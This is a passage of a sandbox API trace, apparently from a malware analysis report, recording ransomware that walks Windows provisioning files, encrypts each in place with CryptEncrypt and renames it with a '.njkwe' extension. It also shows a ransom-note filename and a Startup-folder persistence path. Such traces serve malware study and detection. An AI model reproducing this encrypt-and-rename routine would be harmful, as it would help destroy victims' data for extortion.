"c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\447__connections_cellular_orange (thailand)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\447__Connections_Cellular_Orange (Thailand)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\447__connections_cellular_orange (thailand)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.588] GetProcessHeap () returned 0xbe0000 [0079.588] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.588] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9102401b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9102401b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9102401b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x313, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="448__Connections_Cellular_Orascom (Tunisia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="448__C~1.PRO")) returned 1 [0079.588] lstrcmpiW (lpString1="448__Connections_Cellular_Orascom (Tunisia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.588] lstrcmpiW (lpString1="448__Connections_Cellular_Orascom (Tunisia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.588] lstrcmpiW (lpString1="448__Connections_Cellular_Orascom (Tunisia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.588] lstrcmpiW (lpString1="448__Connections_Cellular_Orascom (Tunisia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.588] lstrcmpiW (lpString1="448__Connections_Cellular_Orascom (Tunisia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.588] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\448__Connections_Cellular_Orascom (Tunisia)_i0$(__MVID)@WAP.provxml") returned 161 [0079.588] StrStrIW (lpFirst="448__Connections_Cellular_Orascom (Tunisia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.588] lstrcmpW (lpString1="448__Connections_Cellular_Orascom (Tunisia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.588] lstrcmpW (lpString1="448__Connections_Cellular_Orascom (Tunisia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.588] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\448__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.588] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\448__Connections_Cellular_Orascom (Tunisia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\448__connections_cellular_orascom (tunisia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.588] GetTickCount () returned 0x115436e [0079.588] GetTickCount () returned 0x115436e [0079.588] GetTickCount () returned 0x115436e [0079.588] GetTickCount () returned 0x115436e [0079.589] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.589] GetProcessHeap () returned 0xbe0000 [0079.589] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.589] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x313, lpOverlapped=0x0) returned 1 [0079.592] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffced, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.592] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x313, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x313, lpOverlapped=0x0) returned 1 [0079.592] GetProcessHeap () returned 0xbe0000 [0079.592] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.592] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.592] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.592] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.592] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.592] CloseHandle (hObject=0x43c) returned 1 [0079.592] GetProcessHeap () returned 0xbe0000 [0079.592] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.592] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\448__Connections_Cellular_Orascom (Tunisia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0079.592] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\448__Connections_Cellular_Orascom (Tunisia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\448__connections_cellular_orascom (tunisia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\448__Connections_Cellular_Orascom (Tunisia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\448__connections_cellular_orascom (tunisia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.593] GetProcessHeap () returned 0xbe0000 [0079.593] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.593] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9104a28e, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9104a28e, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9104a28e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="449__Connections_Cellular_Avea (Turkey)_i0$(__MVID)@WAP.provxml", cAlternateFileName="449__C~1.PRO")) returned 1 [0079.593] lstrcmpiW (lpString1="449__Connections_Cellular_Avea (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.593] lstrcmpiW (lpString1="449__Connections_Cellular_Avea (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.593] lstrcmpiW (lpString1="449__Connections_Cellular_Avea (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.593] lstrcmpiW (lpString1="449__Connections_Cellular_Avea (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.593] lstrcmpiW (lpString1="449__Connections_Cellular_Avea (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.593] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\449__Connections_Cellular_Avea (Turkey)_i0$(__MVID)@WAP.provxml") returned 157 [0079.593] StrStrIW (lpFirst="449__Connections_Cellular_Avea (Turkey)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.593] lstrcmpW (lpString1="449__Connections_Cellular_Avea (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.593] lstrcmpW (lpString1="449__Connections_Cellular_Avea (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.593] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\449__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.594] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\449__Connections_Cellular_Avea (Turkey)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\449__connections_cellular_avea (turkey)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.594] GetTickCount () returned 0x115437e [0079.594] GetTickCount () returned 0x115437e [0079.594] GetTickCount () returned 0x115437e [0079.594] GetTickCount () returned 0x115437e [0079.594] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.594] GetProcessHeap () returned 0xbe0000 [0079.594] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.594] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2c3, lpOverlapped=0x0) returned 1 [0079.595] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.595] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2c3, lpOverlapped=0x0) returned 1 [0079.596] GetProcessHeap () returned 0xbe0000 [0079.596] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.596] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.596] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.596] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.596] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.596] CloseHandle (hObject=0x43c) returned 1 [0079.596] GetProcessHeap () returned 0xbe0000 [0079.596] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.596] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\449__Connections_Cellular_Avea (Turkey)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 177 [0079.596] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\449__Connections_Cellular_Avea (Turkey)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\449__connections_cellular_avea (turkey)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\449__Connections_Cellular_Avea (Turkey)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\449__connections_cellular_avea (turkey)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.597] GetProcessHeap () returned 0xbe0000 [0079.597] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.597] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90247f0e, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90247f0e, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90247f0e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x309, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="44__Connections_Cellular_BASE NV-SA (Belgium)_i0$(__MVID)@WAP.provxml", cAlternateFileName="44__CO~1.PRO")) returned 1 [0079.597] lstrcmpiW (lpString1="44__Connections_Cellular_BASE NV-SA (Belgium)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.597] lstrcmpiW (lpString1="44__Connections_Cellular_BASE NV-SA (Belgium)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.597] lstrcmpiW (lpString1="44__Connections_Cellular_BASE NV-SA (Belgium)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.597] lstrcmpiW (lpString1="44__Connections_Cellular_BASE NV-SA (Belgium)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.597] lstrcmpiW (lpString1="44__Connections_Cellular_BASE NV-SA (Belgium)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.597] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\44__Connections_Cellular_BASE NV-SA (Belgium)_i0$(__MVID)@WAP.provxml") returned 163 [0079.597] StrStrIW (lpFirst="44__Connections_Cellular_BASE NV-SA (Belgium)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.597] lstrcmpW (lpString1="44__Connections_Cellular_BASE NV-SA (Belgium)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.597] lstrcmpW (lpString1="44__Connections_Cellular_BASE NV-SA (Belgium)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.597] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\44__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.597] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\44__Connections_Cellular_BASE NV-SA (Belgium)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\44__connections_cellular_base nv-sa (belgium)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.597] GetTickCount () returned 0x115437e [0079.597] GetTickCount () returned 0x115437e [0079.597] GetTickCount () returned 0x115437e [0079.597] GetTickCount () returned 0x115437e [0079.597] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.598] GetProcessHeap () returned 0xbe0000 [0079.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.598] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x309, lpOverlapped=0x0) returned 1 [0079.599] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcf7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.599] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x309, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x309, lpOverlapped=0x0) returned 1 [0079.599] GetProcessHeap () returned 0xbe0000 [0079.599] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.599] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.599] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.599] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.599] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.600] CloseHandle (hObject=0x43c) returned 1 [0079.600] GetProcessHeap () returned 0xbe0000 [0079.600] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.600] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\44__Connections_Cellular_BASE NV-SA (Belgium)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0079.600] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\44__Connections_Cellular_BASE NV-SA (Belgium)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\44__connections_cellular_base nv-sa (belgium)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\44__Connections_Cellular_BASE NV-SA (Belgium)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\44__connections_cellular_base nv-sa (belgium)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.600] GetProcessHeap () returned 0xbe0000 [0079.600] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.600] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9104a28e, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9104a28e, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9104a28e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="450__Connections_Cellular_KKTCELL (Turkey)_i0$(__MVID)@WAP.provxml", cAlternateFileName="450__C~1.PRO")) returned 1 [0079.601] lstrcmpiW (lpString1="450__Connections_Cellular_KKTCELL (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.601] lstrcmpiW (lpString1="450__Connections_Cellular_KKTCELL (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.601] lstrcmpiW (lpString1="450__Connections_Cellular_KKTCELL (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.601] lstrcmpiW (lpString1="450__Connections_Cellular_KKTCELL (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.601] lstrcmpiW (lpString1="450__Connections_Cellular_KKTCELL (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.601] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\450__Connections_Cellular_KKTCELL (Turkey)_i0$(__MVID)@WAP.provxml") returned 160 [0079.601] StrStrIW (lpFirst="450__Connections_Cellular_KKTCELL (Turkey)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.601] lstrcmpW (lpString1="450__Connections_Cellular_KKTCELL (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.601] lstrcmpW (lpString1="450__Connections_Cellular_KKTCELL (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.601] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\450__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.601] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\450__Connections_Cellular_KKTCELL (Turkey)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\450__connections_cellular_kktcell (turkey)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.601] GetTickCount () returned 0x115437e [0079.601] GetTickCount () returned 0x115437e [0079.601] GetTickCount () returned 0x115437e [0079.601] GetTickCount () returned 0x115437e [0079.601] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.601] GetProcessHeap () returned 0xbe0000 [0079.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.601] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2d0, lpOverlapped=0x0) returned 1 [0079.603] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.603] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2d0, lpOverlapped=0x0) returned 1 [0079.603] GetProcessHeap () returned 0xbe0000 [0079.603] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.603] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.603] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.603] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, 